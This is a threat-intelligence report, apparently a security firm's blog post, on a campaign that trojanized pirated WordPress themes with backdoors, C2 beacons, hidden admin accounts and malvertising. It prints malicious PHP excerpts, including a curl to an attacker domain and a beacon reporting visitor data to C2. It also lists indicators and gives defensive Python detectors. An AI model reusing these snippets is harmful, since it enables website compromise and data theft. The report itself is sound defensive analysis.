Wednesday, February 19, 2020

PHP’s Labyrinth - Weaponized WordPress Themes & Plugins

Overview

Prevailion’s Tailored Intelligence team has followed an active supply chain attack that has been ongoing since late 2017; we named this campaign “PHP’s Labyrinth.” In this operation, threat actors have been able to surreptitiously install malicious files into a large number of premium WordPress themes and plugins. We assess that the responsible party chose to target WordPress because it makes up 60% of all content management systems and 34% of all websites on the internet. WordPress themes and plugins allow the average person to quickly and easily create a website through “drag and drop” features, rather than coding an entire website themselves.

The nefarious actor took advantage of an increased demand for premium themes, and managed to distribute them to various end users through specific WordPress marketplace platforms. These marketplace platforms were created by the threat actor; we were able to discover 30 different platforms used to distribute the trojanized themes and plugins. Three of the most popular webpages on these platforms were:
      “Ultimate Support Chat” with approximately 700k views,
      “WooCommerce Product Filter” with approximately 175k views, and
      “Slider Revolution v5.4.8.1” with approximately 125k views.

Thus far Prevailion has been able to identify over 20k actively compromised web servers worldwide that are displaying evidence of compromise. This data is currently available on the Prevailion Apex platform. Based upon the number of views from the malicious platforms, we speculate that the total number of infected web servers is likely much higher, potentially in the hundreds of thousands. Due to the pandemic nature of this threat, Prevailion coordinated its efforts on this campaign with appropriate U.S. law enforcement.

The attack commences when an unsuspecting victim uploads a trojanized theme to their web server. References to those trojanized files date back to Stack Overflow posts from October 2017. Once all the malicious files are downloaded, the threat actor gains full control over the web server, allowing them to add an administrative account and recover the web admin’s email account and WordPress password hash. If the password was recovered from the hash and was used for multiple accounts, it could allow access to corporate resources.

In most cases we assess that the web servers ultimately became part of the Propeller Ads advertising network. Additional research shows that the Propeller Ads network has been associated with a plethora of malicious activity from different threat actors, including but not limited to malvertising and the Fallout exploit kit. This ad network is manipulated by attackers to become the contagion vector, allowing threat actors to remotely post malicious ads on otherwise benign websites. The malicious ads run JavaScript files and surreptitiously install malware on victimized machines. If successful, this technique could allow the threat actor to steal usernames, passwords, and private files from victims' computers.

WordPress Malware

PHP’s Labyrinth Campaign Walk Through

Infection source

The Prevailion team has been able to identify 30 platforms that served trojanized WordPress themes. The most prominent website appeared to be Vestathemes.com. The website description states that they offer “Thousands of free nulled, [a.k.a. pirated] WordPress Themes and Plugins.” When analyzing this cluster of WordPress platforms we observed a number of irregularities that make us believe they were fictitious and managed by the same entity. For instance, sites had broken links to social media icons that took the visitor right back to the homepage; furthermore, all the suspicious websites appeared to use the same template.

Screenshot of Vestatheme.com and null5.top website

To support this claim: in at least one instance a domain created by the threat actor, null24[.]icu, displayed a page header reading Nulledzip[.]download, which is one of the other websites. That domain, nulledzip[.]download, was also flagged in a Digital Millennium Copyright Act takedown notice that can be found here.

Based on our analysis, we identified 30 websites that correlate to this cluster.

Loader

The “class.theme-modules.php” or “class.plugin-modules.php” file is the operative file that was added to all the trojanized themes. The threat actor added functionality that allows the command and control node to be changed to a “newdomain” periodically. The next function obtains a “$wp_auth_key” from one of the 1st stage C2s. Afterward, it writes the content returned by the 1st stage C2’s code.php URL to a file called “wp-tmp.php”. The malware then performs host-based reconnaissance and attempts to enumerate the following directories:

      upload
      cli
      media
      template
      uploads
      components
      modules
      images
      img
      includes
      plugins
      css
      administrator
      language
      tmp
      js
      admin
      layouts
      upgrade
      image
      bin
      libraries
      engine
      file
      cache
      logs
      templates
      files
      wp-admin
      wp-content
      wp-includes

Next it checks whether certain files exist, such as post.php and wp-vcd.php, and creates them on the system if they do not. It then copies the “WP_CD_Code” function to “wp-vcd.php”. This is the file that seems to have drawn the most attention over the past few years, and it has been mentioned on WordPress web forums. The wp-vcd.php file contains the malicious code copied from the file “class.theme-modules.php” that was previously discussed.

Then it checks for a file named functions.php; if that file exists, it calls file_get_contents() against the 1st stage C2, passing the HTTP_HOST, password and install hash as parameters. One such GET request would look like this:
http://www.trilns.com/o.php?host=www.compromiseddomain.com&password={MD5hash}

The same code then repeats the process and iterates over two other domains with different generic top-level domains (gTLDs). We suspect that these domains serve as backup communication channels in case an issue arose with the primary domain. The three URLs used in the December campaign were:
      hxxp://www.vrilns[.]com/code[.]php
      hxxp://www.vrilns[.]pw/code[.]php
      hxxp://www.vrilns[.]top/code[.]php

Once the code creates the new wp-vcd.php file, it deletes the file class.theme-modules.php.
In the following sections we examine the three files that were created by the loader script. Note that some of the files will be discussed throughout the report; here we show the files as they appear after the loader module was run once.

Newly Observed Shift in Tactics

We observed the threat actor altering their tactics, techniques and procedures (TTPs) starting in late December 2019, after another security firm published a report detailing aspects of this activity. The most recently registered threat actor domain was frilns[.]com, which used Alidns (Alibaba Cloud DNS) instead of Cloudflare. The threat actor also no longer relied upon Cloudflare hosting services and seemingly moved all the domains to a single IP address, 94[.]156[.]175[.]170. One more change is that the threat actor removed the secondary and tertiary communication channels during the December 2019 to January 2020 timeframe.

1st Stage

At this point we see the threat actor taking action from their 1st stage server, adding code to the existing files on the compromised machine. One modified file was functions.php; the threat actor added a line of code to the top of this file that would run the wp-vcd.php file. The next file modified was wp-tmp.php, which as mentioned above contains the $wp_auth_key. It was here that we took note of two additional sections of code.

The first section downloads additional code and adds it to the top of functions.php from a 1st stage C2. An example of this (the excerpt below swaps the 1st stage hostname pacocs.top for pacocs.xyz in both the parent and child theme’s functions.php; the original excerpt was cut off after the second str_replace, and the final write is restored by symmetry with the first branch):

$file  = file_get_contents(get_template_directory() . '/functions.php');    // parent theme
$filec = file_get_contents(get_stylesheet_directory() . '/functions.php');  // child theme
$rep  = "pacocs.top";   // hostname currently embedded in functions.php
$repw = "pacocs.xyz";   // replacement hostname
if (stripos($file, $rep) !== false) {
    $new_file = str_replace($rep, $repw, $file);
    @file_put_contents(get_template_directory() . '/functions.php', $new_file);
}
if (stripos($filec, $rep) !== false) {
    $new_filec = str_replace($rep, $repw, $filec);
    @file_put_contents(get_stylesheet_directory() . '/functions.php', $new_filec);
}

The second section of code adds a persistent cookie called “wordpress_cf_adm_use_adm” to anyone who visits the website; however, the cookie would only be added to users who came to the website from one of the following search engines:
      Google,
      Yahoo,
      Yandex,
      MSN,
      Baidu,
      Bing, and
      DoubleClick.

The cookie includes the referring search engine as well as a reference to the compromised domain that was visited, and is set to persist for 1000 days. Once the cookie was attached to the end user, their IP address is added to a list that lives in the file called “wp-feed.php.” The code used by the threat actor appears to be a slight modification of code found on another WordPress forum, in a thread that discussed how to target visitors arriving at your site from search engines.
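As an added example (not code from the report), the following Python scans a WordPress tree for the file artifacts described in the loader and 1st stage sections: the dropped file names (wp-vcd.php, wp-tmp.php, wp-feed.php, post.php, class.theme-modules.php), the wp-vcd.php include prepended to functions.php, and the WP_CD_Code, $wp_auth_key and wordpress_cf_adm_use_adm strings. The sample tree it builds is constructed; a real sweep would point scan_wordpress() at the site root.

```python
"""Scan a WordPress tree for the file artifacts described in this report."""
import tempfile
from pathlib import Path

# File names the loader drops or ships with. post.php is a legitimate core
# file under wp-admin/, so it is only treated as suspicious inside wp-content/.
DROPPED_FILES = {"wp-vcd.php", "wp-tmp.php", "wp-feed.php",
                 "class.theme-modules.php", "class.plugin-modules.php"}
CONTENT_ONLY_FILES = {"post.php"}

# Strings the report ties to the malicious code: the wp-vcd.php include added
# to functions.php, the WP_CD_Code routine, the $wp_auth_key value and the
# referrer-gated cookie name.
CONTENT_MARKERS = ("wp-vcd.php", "WP_CD_Code", "wp_auth_key",
                   "wordpress_cf_adm_use_adm")


def scan_wordpress(root):
    """Return sorted (relative_path, reason) findings for every .php file."""
    root = Path(root)
    findings = set()
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        if path.name in DROPPED_FILES:
            findings.add((rel, "dropped file name"))
        elif path.name in CONTENT_ONLY_FILES and rel.startswith("wp-content/"):
            findings.add((rel, "dropped file name"))
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for marker in CONTENT_MARKERS:
            if marker in text:
                findings.add((rel, f"contains marker {marker!r}"))
    return sorted(findings)


def build_sample_tree(base):
    """Construct a toy WordPress tree: one infected theme, one clean theme."""
    base = Path(base)
    infected = base / "wp-content" / "themes" / "sample-theme"
    clean = base / "wp-content" / "themes" / "clean-theme"
    for d in (infected, clean, base / "wp-admin"):
        d.mkdir(parents=True)
    # Legitimate core file that must not be flagged by name.
    (base / "wp-admin" / "post.php").write_text("<?php // core editor page\n")
    # The loader prepends an include of wp-vcd.php to the theme's functions.php.
    (infected / "functions.php").write_text(
        "<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) "
        "include_once(dirname(__FILE__) . '/wp-vcd.php');\n"
        "// ... ordinary theme code follows ...\n")
    # Stand-in for the dropped backdoor (constructed, not the real code).
    (infected / "wp-vcd.php").write_text("<?php // WP_CD_Code stand-in\n")
    (clean / "functions.php").write_text(
        "<?php add_theme_support('title-tag');\n")


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_wordpress(tmp)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```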

New Administrative Account

In order to ensure continued access to the infected websites, the threat actor also added an administrative account. This account allows them to simply log back into the website (with administrative privileges) at any time to alter any files. There was one variant of this malware, reported by Astra, where the threat actor would create the username “wpadmin”. More recent reporting on Medium indicated that the threat actor kept this feature but switched to a different username, “100010010”.

2nd Stage

Functions.php

We came back to the functions.php file to analyze the new code added during the last step. The new segment of code sets the maximum upload and post size to 128 megabytes. It also specifies that if the code takes longer than 600 seconds to execute, it should stop. We hypothesize that these features were added to ensure their activity was not detected, as a hung process would be more likely to cause problems and be investigated by a responder.

@ini_set( 'upload_max_size' , '128M' );  // note: 'upload_max_size' is not a PHP directive (upload_max_filesize is), so this call has no effect
@ini_set( 'post_max_size', '128M');
@ini_set( 'max_execution_time', '600' );

Next it obtains the IP address, bot number, pack and user-agent string of the compromised machine and sends them to a threat actor-controlled C2.

// $hoho assembles to hxxp://dolodos[.]top
$result = get_url(implode("", $hoho) . "/logs/dolodos.php?url=" . urlencode("http://" . $server_host . $_SERVER["REQUEST_URI"])
    . "&ref=" . urlencode(@$_SERVER["HTTP_REFERER"]) . "&ip=" . checked_ip()
    . "&bot=$bot_num&pck=$pck&uagent=" . urlencode($_SERVER["HTTP_USER_AGENT"]));
// fetch the current redirect domain for this pack ($pck) and store it base64-encoded
system("chmod 755 $red_domain_path;curl -s http://piasuna[.]gdn/gen/actual_domain_my.php?pck=$pck | base64 > $red_domain_path");

After identifying the URL pattern we were able to find another live C2 domain through Google, vosmas[.]icu/gen/actual_domain_my.php?pck=ip8.

Google Search for the URL path found in the deobfuscated functions.php file

Through our efforts we were able to identify several additional 2nd stage domains.

One notable aspect: some of these domains, such as medsource[.]top, simply contain instructions that redirect the output to tdreg[.]icu. We therefore suspect that some of the domains may act as relays for the tdreg[.]icu domain.

Below this code there was another copy of the “WP_CD_Code” code that was referenced in the loader section of this report. We believe the threat actor copied this code to numerous files as a secondary means of persistence: in the event that one file is deleted by the systems administrator, they retain access to the compromised WordPress domain.
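As an added example (not code from the report), the following Python matches outbound proxy or egress log lines against the beacon URL shapes described in the loader and 2nd stage sections: the o.php check-in with host and password parameters, the code.php fetch, the /logs/dolodos.php visitor report and the /gen/actual_domain_my.php lookup. The log format and sample lines are constructed; a hostname from the report raises the score, but the URL shape alone is enough to flag a request, which also catches rotated domains.

```python
"""Flag outbound requests matching the C2 URL shapes described in this report."""
import re
from urllib.parse import parse_qs, urlsplit

# Hostnames and the IP address named in the report (defanging brackets removed).
KNOWN_C2_HOSTS = {
    "www.trilns.com", "www.vrilns.com", "www.vrilns.pw", "www.vrilns.top",
    "frilns.com", "dolodos.top", "piasuna.gdn", "vosmas.icu", "tdreg.icu",
    "medsource.top", "94.156.175.170",
}

# (label, path regex, query keys the beacon must carry), taken from the report's
# o.php install check-in, code.php fetch, dolodos.php visitor log and
# actual_domain_my.php redirect-domain lookup.
BEACON_PATTERNS = (
    ("1st stage: install check-in", re.compile(r"/o\.php$"), {"host", "password"}),
    ("1st stage: code fetch", re.compile(r"/code\.php$"), set()),
    ("2nd stage: visitor log", re.compile(r"/logs/dolodos\.php$"),
     {"url", "ip", "bot", "pck", "uagent"}),
    ("2nd stage: redirect-domain lookup",
     re.compile(r"/gen/actual_domain_my\.php$"), {"pck"}),
)

# Assumed log shape (constructed): "<timestamp> <client_ip> <method> <url>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")


def classify_url(url):
    """Return (label, score): 0 = no match, 1 = URL shape only, 2 = shape + known host."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    query_keys = set(parse_qs(parts.query, keep_blank_values=True))
    for label, path_re, required in BEACON_PATTERNS:
        if path_re.search(parts.path) and required <= query_keys:
            return label, (2 if host in KNOWN_C2_HOSTS else 1)
    if host in KNOWN_C2_HOSTS:
        return "known C2 host, unrecognised path", 1
    return "", 0


def scan_log(lines):
    """Return (client_ip, label, score, url) for every line that scores > 0."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        label, score = classify_url(m["url"])
        if score:
            hits.append((m["src"], label, score, m["url"]))
    return hits


# Constructed sample lines, not real telemetry: four beacons and one benign request.
SAMPLE_LOG = """\
2020-01-10T12:00:01Z 10.0.0.5 GET http://www.trilns.com/o.php?host=www.example.com&password=d41d8cd98f00b204e9800998ecf8427e
2020-01-10T12:00:02Z 10.0.0.5 GET http://www.vrilns.top/code.php
2020-01-10T12:00:03Z 10.0.0.5 GET http://dolodos.top/logs/dolodos.php?url=http%3A%2F%2Fwww.example.com%2F&ref=&ip=203.0.113.9&bot=0&pck=ip8&uagent=Mozilla%2F5.0
2020-01-10T12:00:04Z 10.0.0.5 GET http://rotated-host.example/gen/actual_domain_my.php?pck=ip8
2020-01-10T12:00:05Z 10.0.0.5 GET https://api.wordpress.org/core/version-check/1.7/
""".splitlines()

if __name__ == "__main__":
    for src, label, score, url in scan_log(SAMPLE_LOG):
        print(f"[{score}] {src} {label}: {url}")
```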

Wp-tmp.php - Search Engine Optimization (SEO) component

This group calculated all the angles when it came to manipulating searches. Another calculated effort was to raise the Search Engine Optimization (SEO) profile of the sites they controlled, creating a cost-effective means to draw more “clicks” and using that leverage to proliferate. To accomplish this, they run a series of commands on the compromised websites in order to enumerate each individual site. This included three command handlers:
      case 'get_all_links'
      case 'set_id_links'
      case 'create_page'

The first command obtains a list of the posts on a compromised WordPress site. The second command allows the attacker to add web links to existing web pages. The third command enables them to create new web pages on the compromised domain. In one file, the threat actor added links to one of the newly controlled marketplaces offering their premium nulled themes. This was likely done to raise the SEO of these websites, ensuring they get more downloads and ultimately more infections.

The functionality in this section appeared to closely mirror code found on another Stack Overflow post, where the incident responder claimed to find the snippet saved in the file “post.php.” This is where the attackers can also add “keywords” to make the website more popular, likely in an attempt to raise the website’s profile so it could display more ads. As noted by other researchers in previous reporting, this aspect of the campaign utilized the domain *.spekt[.]pw. The advertising component will be explained in the section below.

Ad-Blocker Script

In more recent versions of wp-tmp.php, there was a PHP script that served as an anti-ad-blocker and was used through at least September 2019. This allows the website to display ads on the visited webpage even if the end user was using a program such as “Ad-Blocker”. Based upon lexicon analysis of the code found in the sample, the script appeared to be a slightly modified version of PHP code found in a web forum post from 2017.

Javascript - Advertising network

After the ad-blocker code, there is a line for a function called “slider_option” used to make asynchronous requests to two JavaScript files hosted on remote servers. These hostnames correspond to the advertising service Propeller Ads. Propeller Ads is an online ad service where various end users can bid to have their ads displayed on an otherwise benign website. While this has become a standard marketing technique, unfortunately it can also be abused by threat actors with more nefarious intentions. In order to ensure the correct person receives the advertisement revenue for displaying the ads, the accounts are identified by their zone ID.

A copy of the JavaScript used to invoke the ads is displayed below:
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1558098&interactive=1&pushup=1"></script>
<script src="//defpush.com/ntfc.php?p=1565632" data-cfasync="false" async></script>

Propeller Ad Network

Generating Money through Advertisements 

Once the WordPress website was compromised, the threat actor appeared to be interested in generating revenue through the Propeller Ads network. While the Propeller Ads network presents itself like any other ad network, it has a history of being used by criminal organizations for malicious purposes. Its extensive run-ins with various computer security firms resulted in an article about these activities being written by TechTarget in 2017.

Malvertising

Malvertising is when threat actors are able to display malicious ads, and run remote JavaScript files, on otherwise benign websites. Cisco wrote a comprehensive report on advertising and malvertising last year that explains the marketing aspects of how paid advertising works. For those who are unfamiliar, the client chooses a plan and pays:
      Every time the advertisement is shown (pay per impression)
      Every time the advertisement is clicked (pay per click)
      Every time the advertisement is shown, clicked, and something is ordered from the website (pay per order)

During the course of our investigation we visited a compromised domain and got the following URL. We have removed the domain and cep string from the URL to avoid identifying the victim.

https://{compromised-Domain}/testomaster-br.php?cep={string}&widget_id=5633835s733669&teaser_id=2497610&click_id=49d0d459e09b42d26f378dea3140b06f&category_id=145&campaign_id=480469&click_price=0.005

From this example, we determined that the threat actor was receiving half a cent every time someone would click on the advertisement. In numerous cases, the advertisements were completely benign and would direct the end user to a legitimate service or website. In other cases, however, we observed pop-up ads prompting the user to download potentially unwanted programs (PUPs), sometimes called adware. These redirections could occur from a user clicking on a box to “allow notifications” or in some cases just clicking URLs embedded within the website. In one instance, we clicked on the “about us” link and received a pop-up like the one below.

“Flash Player Update” Malvertising for Windows 10 machines from uniqueapps[.]app

In other cases the advertisements don't look like advertisements at all, and mimic “Software Updates”.

“Software Update” Malvertising for OSX machines from tharbadir[.]com

If an end user clicks on the pop-up advertisement, it could install the potentially unwanted program on their local machine. Once on the local machine, these programs can continue to redirect the victim’s web browser to certain websites or even download additional malware from the internet.

Fallout Exploit Kit

The Nao Security Twitter account stated that they observed Propeller Ads redirect victims to domains associated with the Fallout Exploit Kit.

Image created by Nao Security and posted on Twitter, showing propellerads.php redirecting to an exploit kit

In addition to the screenshot above, other security firms such as FireEye have previously noted the Fallout Exploit Kit being propagated to victims through advertising networks. They noted that the victim would likely be served either a malvertising pop-up, similar to those in the previous section, or connected to the exploit kit based upon the browser profile from the user-agent string and potentially the location of the victim. If the browser was successfully exploited by the kit, Viriback noted that it appeared to drop a variant of Zloader. The Zloader agent has historically been used to download additional payloads.

Compromise Intelligence Details

Once Prevailion was able to identify the command and control nodes associated with this particular campaign, we collected the associated telemetry information. We then cleaned the data using proprietary algorithms, thereby reducing bias and the rate of false positives. This refined data is called Evidence of Compromise (EoC), which allows us to create a global contagion snapshot representing a portion of impacted organizations. The map below denotes organizations that present EoC associated with PHP’s Labyrinth compromised web servers.

Prevailion Global Contagion Snapshot of EoC.

Based upon our telemetry, affected organizations are spread across a multitude of countries and sectors. As is typical with supply chain attacks, there was no clear targeting of any one individual sector, and so the resulting contagion map shows a victimology that largely reflects the popularity of WordPress. Based upon our findings, we identified that small to medium sized businesses accounted for more than a fifth of all compromised entities, as they are the primary customers of premium third-party themes. This is most likely due to the fact that many lack the necessary funding or human capital to build a completely custom website, unlike larger, more established firms.

Additionally, we identified a number of more prominent victims, including but not limited to:
      A decentralized crypto-mining website
      A U.S. based stock trading firm
      A small U.S. based bank
      A government run petro/chemical organization
      A U.S. based insurance company
      A large U.S. based manufacturer
      A U.S. payment card solution organization
      A U.S. based IT services organization

While compromises of smaller third parties may at first appear to be a nuisance, these instances can actually become quite dangerous later on down the road. Larger organizations typically have more money to invest in their cyber defense programs, so it becomes much easier to launch a campaign through a supply chain vendor than it would be to directly attempt to infect a larger corporation. If left undetected, threat actors can use these initial infections to pivot and affect larger organizations through their smaller, less defended third parties.

Mitigations

In order to protect against the WordPress malware, we recommend against using any pirated, a.k.a. nulled, software. Organizations should instead utilize either open-source software or pay for premium themes. If your organization’s web server is running a Windows-based operating system, we recommend enabling and updating Windows Defender.

The default WordPress passwords are stored in their current state as a hybrid of MD5 hashes and phpass, which are proven vulnerable to collision attacks. Through recovery of the username and MD5 hash, an attacker could find a collision offline to facilitate access to the organization's corporate network. This emphasizes the problem of password reuse, which has plagued the industry. When configuring any WordPress website, we encourage web administrators to use more secure hashing algorithms, and to never reuse passwords across multiple accounts.

In order to curtail the threat posed to end users who visit these compromised websites, we recommend using a plugin like NoScript that prevents remote JavaScript from running on your machine. We also recommend updating to the latest operating systems and web browsers. This could help protect against certain exploit kits, which are known to target outdated web browsers. If you click on a malvertising ad, we recommend scanning your computer with an up-to-date version of antivirus to minimize the impact of the threat.

Conclusion

While the problem of compromised websites is not new, it will continue to plague end users, administrators, and the internet as a whole. As WordPress becomes even more prominent, it is an ever more appealing target for attackers. To make matters worse, all end users need to do is download one malicious theme or even one plugin to compromise the integrity of the entire web server. In one instance we observed a verified ThemeForest purchaser ask questions on support forums about the malicious files, and even include references to one of the command and control domains. We then downloaded that same theme but did not see any malicious files, and suspect the end user likely downloaded a plugin from a malicious platform in conjunction with the ThemeForest theme.

At this time, the threat actor seems content with generating revenue off the advertising aspect of this campaign; however, we cannot ignore the fact that in its present state it has metastasized into a massive botnet, with all the potential issues that represents. This could also have far-reaching impact, as it gives other criminals a platform to perform malvertising and use various exploit kits to amplify their reach. We assess that by exposing and countering this activity, we are able to impact both this threat actor and the other criminals who use these compromised sites as a platform to exploit end users, creating a ripple effect that makes everyone safer.

We believe that this campaign was able to continue for so long due to the placement of these web servers. Similar to the VPNFilter malware, these web servers are typically located outside of the company's standard perimeter. Many of these web servers are running without anti-virus software and are rarely checked except for when they go offline. This unique combination makes them an ideal target for attackers, and we expect continued targeting of web servers and WordPress-related software to remain a serious threat to network defenders.

Indicators of Compromise

1st stage domains
frilns[.]com
crilns[.]com
brilns[.]com
trilns[.]com

1st stage IP address
94[.]156[.]175[.]170




2nd stage samples:

Malvertising
17a74e5611aeb79f8443a985edbd9f44319af063cc8eda8297f207127ae706b8
fab349488ea7d99a24f7bc97f9e216b4e04e3d257cc02f25ad5b2f6629605321
6a88fb15e191eb7dd0f5efd5313c69cd8271658787bc94e618cbf9542d47686d

Zloader
712503faf40a5e21efd4f2c718674c14a83eca0d6ebe41f985a16a9218111a9f
eafbd21a0f9f082fa2e94e010569d7fa8512d978087c2633d652b865b922465a

Domains
kdsidsiadsakfsas[.]com/gate[.]php
oajdasnndkdahm[.]com/gate[.]php


